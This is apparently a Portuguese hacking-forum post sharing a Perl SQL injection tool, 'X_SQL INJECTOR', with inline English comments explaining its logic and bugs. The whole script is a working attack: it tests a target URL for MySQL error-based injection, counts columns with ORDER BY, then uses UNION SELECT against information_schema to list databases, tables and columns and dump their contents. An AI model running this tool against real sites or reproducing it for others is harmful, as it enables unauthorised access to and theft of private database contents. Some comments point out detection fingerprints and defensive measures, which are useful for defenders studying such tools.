Script Beta, algumas imagens mostrando o funcionamento:
- Código:
#!/usr/bin/perl
###############################
### X_SQL INJECTOR V0.0.0.1 ###
###############################
###
# Coder:MMxM
# Blog: http://the-blackhats.blogspot.com
# Subscribe: http://youtube.com/user/123456789101161
###
# Versao Beta, nao se esqueca que e beta e por isso esta sujeito a (muitos) erros; na versao 0.0.0.2 vai ser melhor '-'
###
# @Gr33tz(Cyclone , Ut0p|4 , Hacker Fts315 , N3tt3rz , c0de_universal)
###
use strict;
use warnings;
use LWP;
# Usage check: exactly one positional argument (the target URL) is required.
if($#ARGV != 0){
print '
X_SQL INJECTOR V0.1 By MMxM [http://the-blackhats.blogspot.com]
Como usar: x_sql.pl <url-vull>
exemplo: x_sql.pl http://localhost/sqli.php?id=1
';
exit
}
my $url = $ARGV[0];
# Prepend a scheme when the argument has none. Only "http://" is ever added; an
# "https://" argument does not match this test and would become "http://https://...".
if($url !~ /^http:\/\//){
$url = 'http://'.$url;
}
print '
X_SQL INJECTOR V0.0.0.1 *-* BY MMxM
Site a ser analisado: '.$url;
# Script-wide state shared by every sub below. The subs do not take their
# inputs from arguments: $url is the base URL, $target is the URL connect()
# actually fetches, and $inject is the column template built by inject().
# Several subs reassign $target, and the count_* subs rewrite $url in place.
my $target = $url;
&vuln();
my $inject = &inject();
print '
[*] Selecione:
[1] Descobrir nome dos databases
[2] Descobrir tabelas de um database
[3] Descobrir colunas de uma tabela
[4] Dumpar conteudo das colunas
>> ';
# Menu choice. The handle is spelled in lower case; Perl accepts "stdin" as an
# alias of STDIN, but STDIN is the conventional spelling (confirm on the target perl).
chomp(my $op = <stdin>);
# Numeric comparison: non-numeric input warns under "use warnings" and ends up
# in the else branch below.
if($op == 1){
&db_dumper();
} elsif($op == 2){
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
# Names are turned into a 0x... hex literal by the local hex() sub (not the builtin).
$database = '0x'.&hex($database);
&table_dumper($database);
} elsif($op == 3){
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
$database = '0x'.&hex($database);
print 'Digite o nome da tabela: ';
chomp(my $tabela = <stdin>);
$tabela = '0x'.&hex($tabela);
&columns_dumper($database,$tabela);
} elsif($op == 4){
# Unlike options 2 and 3, the names read here are passed on verbatim (no hex encoding).
print 'Digite o nome do database: ';
chomp(my $database = <stdin>);
print 'Digite o nome da tabela: ';
chomp(my $tabela = <stdin>);
print 'Digite o nome da coluna: ';
chomp(my $coluna = <stdin>);
&dumper_dumper($database,$tabela,$coluna);
} else {
die("[-] OPCAO INVALIDA ");
}
# Fetches the global $target with an HTTP GET and returns the response body.
# The argument callers pass as &connect($target) is never read; the URL always
# comes from the global. The empty () prototype would reject arguments, but every
# call site uses the & sigil, which bypasses prototypes. The name also shadows the
# builtin connect(); only the &-form reaches this sub.
# Dies on any status other than 200.
sub connect(){
my $ua = new LWP::UserAgent;   # indirect-object syntax; LWP::UserAgent->new is the conventional form
# Fixed User-Agent sent on every request. Together with the 0x6d6d786d ("mmxm")
# marker that inject() puts in each query it is a stable fingerprint for
# server-side logs and WAF rules.
$ua->agent('Mozilla/5.5 (compatible; MSIE 5.5; Windows NT 5.1)');
$ua->timeout(15);
my $request = HTTP::Request->new('GET');
$request->url($target);
my $response = $ua->request($request);
my $code = $response->code;
if($code != 200){
die '[-] Request erro: status code '. $code;
}
my $headers = $response->headers_as_string;   # computed but never used
my $body = $response->content;
return $body;
}
# Error-based probe: appends a single quote to the global $target and dies unless
# the response body contains MySQL's "You have an error in your SQL syntax" text.
# Side effect: $target keeps the appended quote after this sub returns.
# A server that returns generic error pages instead of database messages never
# passes this check, which is the usual argument for not echoing DB errors to clients.
sub vuln(){
$target = $target."'";
if(&connect($target) =~ /You have an error in your SQL syntax/i){
print "\n[+] Site possivelmente vulneravel\n";
} else {
die("\nSite aparentemente sem erros\n");
}
}
# Sends "$url order by N--" for N in 1..100 and returns N-1 at the first response
# containing "Unknown column". Returns nothing (undef in scalar context) when no
# response matches within 100 tries; inject() then loops over 1..undef.
# Style notes: the loop variable is named $a, which masks the sort() special
# variable; the "last" after "return" is unreachable.
sub columns(){
print "\n[*] Verificando colunas ...\n";
foreach my $a (1..100){
$target = $url." order by ".$a."--";
if(&connect($target) =~ /Unknown column/i){
print '[+] O alvo parece ter '. ($a-1) .' colunas !!!';
return ($a-1);
last;
}
}
}
# Builds the column template stored in the global $inject: "1,2,...,n" where n is
# the count from columns(), with every entry rewritten to
# concat(0x6d6d786d,...INJECTION...,0x6d6d786d). 0x6d6d786d is the ASCII bytes of
# "mmxm"; the callers' /mmxm(.*)mmxm/ regexes rely on those markers framing the
# value. The literal placeholder "...INJECTION..." is left for each caller to
# substitute. The (.*?) capture in the first substitution is never used.
sub inject(){
my $n = &columns();
my $un = '';
foreach my $c(1..$n)
{
$un.="$c,";
}
$un =~ s/(.*?),/concat(0x6d6d786d,...INJECTION...,0x6d6d786d),/g;
$un =~ s/,$//g;   # drop the trailing comma left by the loop above
return $un;
}
# Returns the text found between the "mmxm" markers in the response to a
# count(*) query against information_schema.schemata, or dies.
# Note the "..." in the s/// pattern are regex wildcards; they happen to match
# the literal dots of the "...INJECTION..." placeholder.
# Unlike count_table/count_columns/count_dumper, the s/=/=-/g rewrite is applied
# to the local $target, so the global $url is left untouched here.
sub count_db(){
my $dbs_count = $inject;
$dbs_count =~ s/...INJECTION.../count(*)/g;
$target = "$url union all select $dbs_count from information_schema.schemata--";
$target =~ s/=/=-/g;
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de databases\n");
}
}
# Menu option 1. Prints the count from count_db(), then issues one request per
# value in 1..$db_number, using that value as the LIMIT offset, and prints whatever
# appears between the "mmxm" markers. Responses without markers are skipped silently.
# $target is reassigned on every iteration; $url is only read here.
sub db_dumper(){
my $db_number = &count_db();
print "\n[+] Numeros de databases: $db_number\n\n";
my $dbss = $inject;
$dbss =~ s/...INJECTION.../schema_name/g;
foreach my $dbs(1..$db_number){
$target = "$url union all select $dbss from information_schema.schemata LIMIT $dbs,1";
$target =~ s/=/=-/g;
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
# Returns the text between the "mmxm" markers for a count(*) over
# information_schema.tables filtered by table_schema=$database, or dies.
# $database is the 0x... literal prepared by the caller.
# Side effect: s/=/=-/g rewrites the global $url in place (every "=" in it), not a
# copy, and the rewrite is applied again on each further call in the same run.
sub count_table(){
my $database = shift;
my $table_count = $inject;
$table_count =~ s/...INJECTION.../count(*)/g;
$url =~ s/=/=-/g;
$target = "$url union all select $table_count from information_schema.tables where table_schema=$database--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de tabelas\n");
}
}
# Menu option 2. Prints the count from count_table($database), then issues one
# request per value in 1..$table_number (used as the LIMIT offset) and prints the
# text between the "mmxm" markers. Responses without markers are skipped silently.
# Side effect: the s/=/=-/g on the global $url here runs after count_table() has
# already applied the same rewrite, so in this path it is applied twice.
sub table_dumper(){
my $database = shift;
my $table_number = &count_table($database);
print "\n[+] Numeros de Tabelas: $table_number\n\n";
my $table = $inject;
$table =~ s/...INJECTION.../table_name/g;
$url =~ s/=/=-/g;
foreach my $tables(1..$table_number){
$target = "$url union all select $table from information_schema.tables where table_schema=$database LIMIT $tables,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
# Returns the text between the "mmxm" markers for a count(*) over
# information_schema.columns filtered by table_schema=$database and
# table_name=$tabela, or dies. Arguments are taken positionally: the first (shift)
# and the last (pop) element of @_. Both are 0x... literals prepared by the caller.
# Side effect: s/=/=-/g rewrites the global $url in place.
sub count_columns(){
my $database = shift;
my $tabela = pop;
my $column_count = $inject;
$column_count =~ s/...INJECTION.../count(*)/g;
$url =~ s/=/=-/g;
$target = "$url union all select $column_count from information_schema.columns where table_schema=$database and table_name=$tabela--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de colunas\n");
}
}
# Menu option 3. Prints the count from count_columns($database,$tabela), then
# issues one request per value in 1..$column_number (used as the LIMIT offset) and
# prints the text between the "mmxm" markers. Responses without markers are
# skipped silently. Same first/last positional argument handling as count_columns().
# Side effect: the s/=/=-/g on the global $url is applied here again after
# count_columns() already applied it.
sub columns_dumper(){
my $database = shift;
my $tabela = pop;
my $column_number = &count_columns($database,$tabela);
print "\n[+] Numeros de colunas: $column_number\n\n";
my $columnss = $inject;
$columnss =~ s/...INJECTION.../column_name/g;
$url =~ s/=/=-/g;
foreach my $column(1..$column_number){
$target = "$url union all select $columnss from information_schema.columns where table_schema=$database AND table_name=$tabela LIMIT $column,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
print "[*] $1\n";
}
}
print "\n";
}
# Returns the text between the "mmxm" markers for "count($_[2])" over
# "$_[0].$_[1]", or dies. Arguments are read directly from @_ by position:
# $_[0] database, $_[1] table, $_[2] column, all passed verbatim by the caller
# (no hex encoding in this path). $_[2] is interpolated inside the s/// replacement.
# The die message says "colunas" although this sub counts rows, not columns.
# Side effect: s/=/=-/g rewrites the global $url in place.
sub count_dumper(){
my $dumper_count = $inject;
$dumper_count =~ s/...INJECTION.../count($_[2])/g;
$url =~ s/=/=-/g;
$target = "$url union all select $dumper_count from $_[0].$_[1]--";
if(&connect($target) =~ /mmxm(.*)mmxm/){
return $1;
} else {
die("\n[-]Erro ao descobrir numeros de colunas\n");
}
}
# Menu option 4. Prints the row count from count_dumper(), then issues one request
# per value in 1..$dumper (used as the LIMIT offset). The "hex($_[2])" written into
# the replacement is SQL text (the server-side HEX() function), not the Perl sub
# named hex() at the end of this file; the value that comes back between the
# "mmxm" markers is therefore hex digits, which pack("H*") turns back into bytes.
# Arguments are read positionally from @_ ($_[0] database, $_[1] table, $_[2] column).
# Side effect: the s/=/=-/g on the global $url is applied again after count_dumper()
# already applied it.
sub dumper_dumper(){
my $dumper = &count_dumper($_[0],$_[1],$_[2]);
print "\n\n[+] Numeros de entradas: $dumper\n\n";
my $dm = $inject;
$dm =~ s/...INJECTION.../hex($_[2])/g;
$url =~ s/=/=-/g;
foreach my $dmp(1..$dumper){
$target = "$url union all select $dm from $_[0].$_[1] LIMIT $dmp,1";
if(&connect($target) =~ /mmxm(.*)mmxm/){
my $o = pack("H*",$1);   # decode the hex digits returned by the query
print "[*] $o\n";
}
}
print "\n";
}
# Returns the hex digits of the bytes of its first argument (unpack "H*"); the
# caller prepends "0x" to make a hex literal. The name collides with the builtin
# hex(), which does the opposite conversion (hex string to number). A plain
# hex(...) call still resolves to the builtin; only the &hex(...) form used in this
# script reaches this sub, which is also how the empty () prototype is bypassed.
sub hex(){
my $enc = unpack("H*",shift);
return $enc;
}